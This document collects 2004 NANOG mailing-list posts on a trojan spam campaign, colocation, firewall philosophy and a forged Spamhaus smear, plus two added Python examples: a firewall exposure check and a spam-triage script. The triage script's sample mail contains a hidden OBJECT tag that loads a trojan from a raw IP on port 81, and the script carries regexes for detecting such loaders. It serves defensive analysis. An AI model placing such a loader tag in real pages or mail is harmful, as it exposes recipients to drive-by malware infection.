Have you, by any chance, heard of bcc? That isn't a bug, that's a feature.

--
srs (postmaster|suresh)@outblaze.com // gpg : EDEDEFB9
manager, outblaze.com security and antispam operations
Re: Hi (fwd)
Interesting, it does respond, albeit sporadically.. It contains the usual stuff... a trojan.. It looks like a variant of Psyme.. *sigh*

-colin.

On 18/03/2004, at 4:33 PM, william(at)elan.net wrote:

> Methinks somebody has found a trapdoor in the NANOG mail setup and is in general out to get us ... This one supposedly came from 203.18.63.43 (Australia Powerhouse Museum - phm.gov.au) and advertises a page on IP 165.134.187.102 (Saint Louis University - slu.edu). Connection refused when I tried to see what's there.
Re: Personal Co-location Registry
[EMAIL PROTECTED] (TxRx Lists) writes:

> One thing you may want to devote a bit more text to: what are typical provisions for remote hands at these places?

that's one item. others are serial console access, remote power cycle, whether an appointment/escort is required for on-site visits... i can add a row of checkboxes on every entry, but first i'm interested in further normalizing the bandwidth column. and it's looking like i'll need some kind of unpublished e-mail address for each submitter, since a lot of them only advertise phone numbers and i'll need a way to ask for updates when new columns are added. maybe this has to become a database... yipe!

> I agree, lack of interactive access to a system prior to a functional OS being loaded always seemed like a potential problem area to me, particularly for something based on common PC architecture.

http://www.realweasel.com/ is your friend. (isc has about a dozen of 'em.)

> The main thing that's always put me off paying for colocation is the threat of attacks against the system, and not so much the integrity of the data (because obviously I wouldn't keep anything important on it)

not so obvious. my colo'd boxes have everything i care about, and they copy it between each other at night by cron entries. my definition of safe is multiple copies on diverse power grids.

> but more the bandwidth liability. 1&1 state clearly that they account for every byte to/from the NIC so just one unfortunate packet flood could see me paying a lot more than their reasonable monthly fee...

agreed. my preference has been for bandwidth limiting and fixed prices.

-- 
Paul Vixie
Re: Firewall opinions wanted please
> No. Quite apart from the fact that you mean authorized, not authenticated, the primary purpose of a firewall is to keep the bad guys away from the buggy code. Firewalls are the networks' response to the host security problem.

No. Let's imagine that I have 4 hosts without ANY security problems in software, and I'd like to provide a WEB service. The firewall protects the other services from outside access. Without it, you can slogin to me if you know my password, even if the host has no bugs at all. (Of course, SecurID, hand scans etc. decrease the need for this.)

Second. Not EVERY network requires a firewall. If a network (grandma's) does not allow any ACCESS from the Internet (grandma's network does not allow access because it does not expose any IP device to the outside network, using NAT for outgoing connections), it can live without any ACL or any firewall attributes - and be as secure as a production network with expensive firewall(s).

The key word is _ACCESS_. No ACCESS - no firewall (cut the wires). One-way access - many different devices play the role of firewall (a PNAT translator, for example, does 99.9% of the work). More ACCESS required - more COMPLICATED firewalls are required. So the key word is not PROTECTION but ACCESS.
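The ACCESS argument above is easy to check on a real host: list what is listening, decide where each socket is reachable from, and subtract what the inbound filter passes. The script below is an added example written for this page, not code from any of the posters. The `ss -ltn` output is constructed, the allow-lists are hypothetical, and the "lan" classification assumes no port forwarding on the NAT device in front of the host.

```python
"""Which listening services are reachable from the Internet?

Added example, not from the original post.  Works from constructed
`ss -ltn` output and a hand-written inbound allow-list; both stand in
for a real host and its real packet filter.
"""
import ipaddress

# Constructed sample: what `ss -ltn` might print on the imagined web host.
# sshd and httpd listen on the wildcard, MySQL on loopback only, and a
# printer-style service on an RFC 1918 address.
SS_OUTPUT = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port
LISTEN  0       128     0.0.0.0:22           0.0.0.0:*
LISTEN  0       128     0.0.0.0:80           0.0.0.0:*
LISTEN  0       128     [::]:443             [::]:*
LISTEN  0       128     127.0.0.1:3306       0.0.0.0:*
LISTEN  0       128     10.0.0.5:9100        0.0.0.0:*
"""


def listeners(ss_text):
    """Parse `ss -ltn` lines into (bind address, port) tuples."""
    out = []
    for line in ss_text.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] != "LISTEN":
            continue                      # header line or non-listener
        addr, port = fields[3].rsplit(":", 1)
        out.append((addr.strip("[]"), int(port)))
    return out


def reach(addr):
    """Where a socket bound to `addr` can be reached from, before any
    packet filter is considered: 'local', 'lan' or 'internet'."""
    if addr == "*":                       # older ss/netstat wildcard
        return "internet"
    ip = ipaddress.ip_address(addr)
    if ip.is_loopback:
        return "local"
    if ip.is_unspecified:                 # 0.0.0.0 or ::
        return "internet"
    if ip.is_private:                     # assumption: no NAT port-forward
        return "lan"
    return "internet"


def internet_exposed(ss_text, allowed_inbound=None):
    """Ports reachable from the Internet.

    allowed_inbound=None models 'no firewall': every Internet-reachable
    socket is exposed.  A set models a default-deny inbound filter that
    passes only those ports; the empty set is grandma's one-way NAT.
    """
    exposed = set()
    for addr, port in listeners(ss_text):
        if reach(addr) != "internet":
            continue
        if allowed_inbound is None or port in allowed_inbound:
            exposed.add(port)
    return sorted(exposed)


if __name__ == "__main__":
    print("no firewall:   ", internet_exposed(SS_OUTPUT))
    print("web only:      ", internet_exposed(SS_OUTPUT, {80, 443}))
    print("one-way NAT:   ", internet_exposed(SS_OUTPUT, set()))
```

With no filter, sshd (port 22) is reachable by anyone who can guess the password; the web-only allow-list leaves 80 and 443 and nothing else; the empty allow-list is the no-ACCESS case and exposes nothing, regardless of how many daemons the host runs.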
Re: Firewall opinions wanted please
> And I think you have hit it right on the head...another line of defense. Everything I've ever read about security (network or otherwise) suggests that a layered approach increases effectiveness. I certainly don't trust a firewall appliance as my only security device, so I also do prudent things like disable ports and applications that are not in use on my network and enforce authentication and authorization for access to legitimate services.

Unfortunately, it decreases it. If I turn off file sharing on a Windows server, I'll increase security but complicate support (in some cases). If I run an IDS system, I spend time verifying and approving changes made by maintainers. And so on. So it is very important to have a strong FIRST line of defense (inbound firewalls) and a last line (host IDS); it allows a little more efficiency by keeping convenient (but not very secure) protocols inside your internal network. Else you end up in full paranoia.
Re: Spamhaus Exposed
> On Wed, 17 Mar 2004, Steve Linford wrote:
> > From Deep Throat, received 17/3/04, 21:10 + (GMT):
> > > Disturbing information on one of the founders of Spamhaus.org
> > > http://www.geocities.com/jackjack9872004/
> > Not just a load of BS, but posted to NANOG anonymously, through a hijacked machine at 198.26.130.36 (The Pentagon) no less.
>
> federal interest site. that's automatic prison time, isn't it?

Of course not - he is not from the USA (more likely), the end. Why do people believe that these acts mean ANYTHING? On the Internet, they mean NOTHING.
RE: Spamhaus Exposed
Dan Hollis said:
> federal interest site. that's automatic prison time, isn't it?

Alexei Roudnev replied:
> Of course not - he is not from the USA (more likely), the end. Why do people believe that these acts mean ANYTHING? On the Internet, they mean NOTHING.

Unless, of course, she happens to travel to the US at some point.

http://www.usdoj.gov/criminal/cybercrime/ivanovSent_NJ.htm
http://www.usdoj.gov/criminal/cybercrime/gorshkovSent.htm

In the Gorshkov/Ivanov case the Russian FSB formally charged the US FBI with breaking Russian law by hacking in to the gang's Russian computers and gathering evidence. One ruling in the cases said Russian law does not apply to the FBI agents operating in the US. So basically you have both sides claiming "I am the law", and whoever has the body wins.

Dave Hart
Re: Request response
Brian Bruns wrote:
> Erm, something is definitely up tonight. Message is below, for those of you who didn't want to touch this message. I can't get to the site listed in the message, so I have no idea what it's trying to deliver exactly. Anyone care to comment?

SpamAssassin whacked it good -

X-Virus-Scanned: by amavisd-new at mailgate.pbp.net
X-Spam-Status: Yes, hits=8.0 tagged_above=-999.0 required=5.0
    tests=BAYES_01, FORGED_MUA_OUTLOOK, FORGED_OUTLOOK_TAGS, HTML_MESSAGE,
    MIME_HTML_ONLY, NORMAL_HTTP_TO_IP, NO_REAL_NAME, WEIRD_PORT
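The two things people did by hand in this thread, reading the Received chain back to the sending host (william's forward in the "Re: Hi" posts) and recognising the HTML-only body with a hidden OBJECT pointing at a raw IP on an odd port (the NORMAL_HTTP_TO_IP, WEIRD_PORT and MIME_HTML_ONLY tests in Brian's headers), can be done in a few lines. The script below is an added example written for this page, not code from any poster and not SpamAssassin's rules. The sample message is constructed from the headers quoted earlier in the thread with the stripped HTML tags put back; the redacted addresses, the trusted-relay set (198.108.1.26, the merit.edu MX) and the rule names and weights are assumptions.

```python
"""Triage of a hidden-OBJECT mail like the one forwarded to the list.

Added example, not part of the original posts.  Rule names echo the
SpamAssassin tests seen in the thread but the logic and weights are
this script's own assumptions, not SpamAssassin's.
"""
import email
import ipaddress
import re
from email import policy
from email.utils import parseaddr
from urllib.parse import urlparse

# Constructed sample built from the headers quoted in the thread; the
# redacted addresses are placeholders and the first hop is filled in.
SAMPLE = """\
Return-Path: <sender@example.invalid>
Received: from trapdoor.merit.edu (trapdoor.merit.edu [198.108.1.26])
    by mail.example.invalid (Postfix) with ESMTP; Wed, 17 Mar 2004 23:04:50 -0500 (EST)
Received: by segue.merit.edu (Postfix) id 3B2ED5DE4F; Wed, 17 Mar 2004 23:04:48 -0500 (EST)
Received: from PH02887.net (unknown [203.18.63.43])
    by segue.merit.edu (Postfix) with SMTP id 0AE2E5DE32
    for <nanog@example.invalid>; Wed, 17 Mar 2004 23:04:46 -0500 (EST)
Date: Thu, 18 Mar 2004 15:04:22 +1000
To: nanog@example.invalid
Subject: Re: Hi
From: sender@example.invalid
Message-ID: <x@example.invalid>
Content-Type: text/html

<html><body><font face=System><OBJECT STYLE=display:none DATA=http://165.134.187.102:81/132847.php></OBJECT></body></html>
"""

TRUSTED_RELAYS = {"198.108.1.26"}   # assumption: hops we operate ourselves
RECEIVED_FROM = re.compile(
    r"\bfrom\s+\S+\s+\((?:[^\s()]+\s+)?\[(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\]\)")
ATTR_URL = re.compile(
    r"""(?i)\b(?:data|src|href|action)\s*=\s*["']?(https?://[^\s"'>]+)""")
HIDDEN_OBJECT = re.compile(r"(?is)<(?:object|iframe)\b[^>]*display\s*:\s*none")


def originating_ip(msg, trusted=TRUSTED_RELAYS):
    """Walk the Received chain newest-first; the first sending IP that is
    not one of our own relays is the host that handed us the message.
    Anything below that hop was written by the sender and is not trusted."""
    for hdr in msg.get_all("Received", []):
        m = RECEIVED_FROM.search(str(hdr))
        if not m:
            continue                      # e.g. "Received: by host (Postfix) id ..."
        ip = m.group("ip")
        if ip in trusted or ipaddress.ip_address(ip).is_private:
            continue
        return ip
    return None


def html_body(msg):
    """The HTML part's text, or '' if the message has none."""
    body = msg.get_body(preferencelist=("html",))
    return body.get_content() if body is not None else ""


def analyze(raw, required=5.0):
    """Score a raw RFC 2822 message; weights are assumed, not SpamAssassin's."""
    msg = email.message_from_string(raw, policy=policy.default)
    html = html_body(msg)
    urls = ATTR_URL.findall(html)
    hits = []
    if msg.get_content_type() == "text/html" and not msg.is_multipart():
        hits.append(("MIME_HTML_ONLY", 1.0))
    if HIDDEN_OBJECT.search(html):
        hits.append(("HIDDEN_OBJECT", 2.5))   # display:none loader, the payload here
    for url in urls:
        u = urlparse(url)
        try:
            ipaddress.ip_address(u.hostname)  # raw IP literal instead of a name
            hits.append(("NORMAL_HTTP_TO_IP", 1.5))
        except ValueError:
            pass
        if u.port not in (None, 80, 443):
            hits.append(("WEIRD_PORT", 1.0))
    name, _addr = parseaddr(str(msg.get("From", "")))
    if not name:
        hits.append(("NO_REAL_NAME", 0.5))
    score = sum(w for _, w in hits)
    return {"origin": originating_ip(msg), "urls": urls,
            "hits": [h for h, _ in hits], "score": score,
            "spam": score >= required}


if __name__ == "__main__":
    print(analyze(SAMPLE))
```

On the sample this attributes the message to 203.18.63.43, pulls out the single loader URL with its raw IP and port 81, and scores it well past the threshold; a plain-text message with a display name in From hits nothing. The origin lookup is the piece to get right before acting on abuse reports: the Date and the first Received header are under the sender's control, only the hop your own relay recorded is not.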